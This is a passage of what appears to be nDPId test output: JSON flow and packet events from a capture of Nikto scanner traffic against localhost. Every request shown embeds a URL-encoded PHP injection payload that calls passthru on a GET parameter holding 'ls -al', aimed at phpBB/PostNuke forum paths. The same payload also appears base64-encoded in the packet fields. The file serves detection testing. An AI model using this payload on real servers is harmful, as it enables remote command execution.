{"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":699,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":699,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277821,"flow_last_seen":1576420277821,"flow_idle_time":7560000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":1576420277821,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50960,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00899{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":699,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":699,"flow_packet_id":1,"flow_last_seen":1576420277821,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":380,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":380,"pkt_l4_len":346,"thread_ts_msec":1576420277821,"pkt":"AAAAAAAAAAAAAAAACABFAAFu9rlAAEAGRM5\/AAABfwAAAccQH5BepM+ZKyRDwoAYAED\/YgAAAQEICp1m\/2WdZv9lR0VUIC9tb2R1bGVzL2luZGV4LnBocD9uYW1lPWZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNmMlNzMlMjAlMmQlNjElNmMmaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
+01232{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":699,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":699,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277821,"flow_last_seen":1576420277821,"flow_idle_time":7560000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":1576420277821,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50960,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":700,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":700,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277822,"flow_last_seen":1576420277822,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277822,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50962,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":700,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":700,"flow_packet_id":1,"flow_last_seen":1576420277822,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":1576420277822,"pkt":"AAAAAAAAAAAAAAAACABFAAFs7qZAAEAGTON\/AAABfwAAAccSH5AvkdeM6hywhIAYAED\/YAAAAQEICp1m\/2adZv9mR0VUIC9waHBCQi9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01230{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":700,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":700,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277822,"flow_last_seen":1576420277822,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277822,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50962,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":701,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277824,"flow_last_seen":1576420277824,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277824,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50964,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":701,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":701,"flow_packet_id":1,"flow_last_seen":1576420277824,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":1576420277824,"pkt":"AAAAAAAAAAAAAAAACABFAAFsidNAAEAGsbZ\/AAABfwAAAccUH5D2t7Di3ewIxYAYAED\/YAAAAQEICp1m\/2idZv9oR0VUIC9mb3J1bS9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCg0K"} 
+01230{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":701,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277824,"flow_last_seen":1576420277824,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277824,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50964,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":702,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":702,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277827,"flow_last_seen":1576420277827,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277827,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50966,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00892{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":702,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":702,"flow_packet_id":1,"flow_last_seen":1576420277827,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277827,"pkt":"AAAAAAAAAAAAAAAACABFAAFnzSRAAEAGbmp\/AAABfwAAAccWH5CSlfQTmmOJAIAYAED\/WwAAAQEICp1m\/2qdZv9qR0VUIC9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTgpDQoNCg=="} +01224{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":702,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":702,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277827,"flow_last_seen":1576420277827,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277827,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50966,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":703,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277828,"flow_last_seen":1576420277828,"flow_idle_time":7560000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":316,"midstream":1,"thread_ts_msec":1576420277828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00904{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":703,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":703,"flow_packet_id":1,"flow_last_seen":1576420277828,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":382,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":382,"pkt_l4_len":348,"thread_ts_msec":1576420277828,"pkt":"AAAAAAAAAAAAAAAACABFAAFwciZAAEAGyV9\/AAABfwAAAccYH5BC50sWR3m1Q4AYAED\/ZAAAAQEICp1m\/2ydZv9sR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk4KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01234{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":703,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277828,"flow_last_seen":1576420277828,"flow_idle_time":7560000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":316,"midstream":1,"thread_ts_msec":1576420277828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":704,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":704,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277829,"flow_last_seen":1576420277829,"flow_idle_time":7560000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":321,"midstream":1,"thread_ts_msec":1576420277829,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50970,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00908{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":704,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":704,"flow_packet_id":1,"flow_last_seen":1576420277829,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":387,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":387,"pkt_l4_len":353,"thread_ts_msec":1576420277829,"pkt":"AAAAAAAAAAAAAAAACABFAAF14pZAAEAGWOp\/AAABfwAAAccaH5CUOtum6t33\/4AYAED\/aQAAAQEICp1m\/22dZv9tR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9OaWt0bz1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01240{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":704,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":704,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277829,"flow_last_seen":1576420277829,"flow_idle_time":7560000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":321,"midstream":1,"thread_ts_msec":1576420277829,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50970,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":705,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277831,"flow_last_seen":1576420277831,"flow_idle_time":7560000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277831,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50972,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":705,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":705,"flow_packet_id":1,"flow_last_seen":1576420277831,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":381,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":381,"pkt_l4_len":347,"thread_ts_msec":1576420277831,"pkt":"AAAAAAAAAAAAAAAACABFAAFvhNlAAEAGtq1\/AAABfwAAAcccH5Ac\/r3nTujavoAYAED\/YwAAAQEICp1m\/2+dZv9vR0VUIC9tb2R1bGVzL2luZGV4LnBocD9OaWt0bz1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 
+01233{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":705,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277831,"flow_last_seen":1576420277831,"flow_idle_time":7560000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277831,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50972,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":706,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277832,"flow_last_seen":1576420277832,"flow_idle_time":7560000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277832,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50974,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":706,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":706,"flow_packet_id":1,"flow_last_seen":1576420277832,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":379,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":379,"pkt_l4_len":345,"thread_ts_msec":1576420277832,"pkt":"AAAAAAAAAAAAAAAACABFAAFtWm5AAEAG4Rp\/AAABfwAAAcceH5BY22NfXgseaYAYAED\/YQAAAQEICp1m\/3CdZv9wR0VUIC9waHBCQi9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTgpDQoNCg=="} +01231{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":706,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277832,"flow_last_seen":1576420277832,"flow_idle_time":7560000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277832,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50974,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":707,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":707,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277834,"flow_last_seen":1576420277834,"flow_idle_time":7560000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277834,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50976,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":707,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":707,"flow_packet_id":1,"flow_last_seen":1576420277834,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":379,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":379,"pkt_l4_len":345,"thread_ts_msec":1576420277834,"pkt":"AAAAAAAAAAAAAAAACABFAAFtY1BAAEAG2Dh\/AAABfwAAAccgH5CMmFp9naENboAYAED\/YQAAAQEICp1m\/3KdZv9yR0VUIC9mb3J1bS9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTgpDQoNCg=="} 
